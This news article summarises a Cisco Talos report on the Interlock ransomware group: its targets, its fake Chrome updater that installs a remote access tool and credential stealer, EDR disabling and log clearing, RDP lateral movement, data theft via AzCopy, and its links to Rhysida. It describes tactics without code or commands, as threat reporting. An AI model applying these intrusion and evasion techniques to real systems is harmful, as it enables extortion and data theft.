A new ransomware group known as Interlock has been causing significant havoc across various sectors, with reports of targeted attacks on US healthcare, IT, government, and European manufacturing industries. Threat analysts have identified Interlock as a group that employs sophisticated tactics, including “big-game hunting” and double extortion methods, where stolen data is threatened to be released publicly unless a ransom is paid.
The Cisco Talos report released today highlights how Interlock operates with a high level of precision, using a data leak site called “Worldwide Secrets Blog” to publish stolen data and offering victim support through chat options. The group’s systematic approach to targeting vulnerabilities in organizations’ cybersecurity has raised concerns among cybersecurity experts.
According to Cisco Talos, Interlock’s attack chain typically spans around 17 days, during which the group gains unauthorized access to systems and deploys ransomware to encrypt files. The group’s modus operandi involves initiating access through a fake Google Chrome browser updater that installs a Remote Access Tool (RAT) disguised as a legitimate update. This RAT collects detailed system information, establishes a secure connection to a command-and-control (C2) server, and transmits encrypted data, all while installing a credential-stealing component to capture login details for online accounts.
Interlock’s ability to evade detection is further enhanced by its tactics of disabling Endpoint Detection and Response (EDR) tools and clearing event logs. The group also utilizes Remote Desktop Protocol (RDP) and other remote access tools for lateral movement within networks, indicating a sophisticated level of technical skill in reaching different systems, potentially even Linux hosts.
The encryption stage of Interlock’s attacks involves both Windows and Linux variants of ransomware, with both versions leveraging a cryptographic library called LibTomCrypt. To ensure system stability, the group’s ransomware routines bypass crucial system folders and specific file extensions, with Windows systems using Cipher Block Chaining (CBC) encryption and Linux systems potentially utilizing CBC or RSA encryption.
Furthermore, Cisco Talos’ analysis has revealed a potential connection between Interlock and the Rhysida ransomware groups, showcasing overlapping attack techniques, tools, and even code. Both groups have been observed using the AzCopy tool to transfer stolen data to remote storage and deploying ransom notes with similar themes that present themselves as “helpful” breach informants rather than direct threats.
The trend towards operational diversification and collaboration among ransomware groups, as seen in the case of Interlock and Rhysida, reflects a broader pattern in the cyber threat landscape. Threat actors are increasingly pooling their resources and expertise to enhance their capabilities and maximize the impact of their attacks.
In conclusion, the emergence of the Interlock ransomware group underscores the evolving and complex nature of cyber threats facing organizations worldwide. As such, it is imperative for businesses and government entities to enhance their cybersecurity measures and remain vigilant against sophisticated ransomware attacks like those orchestrated by Interlock.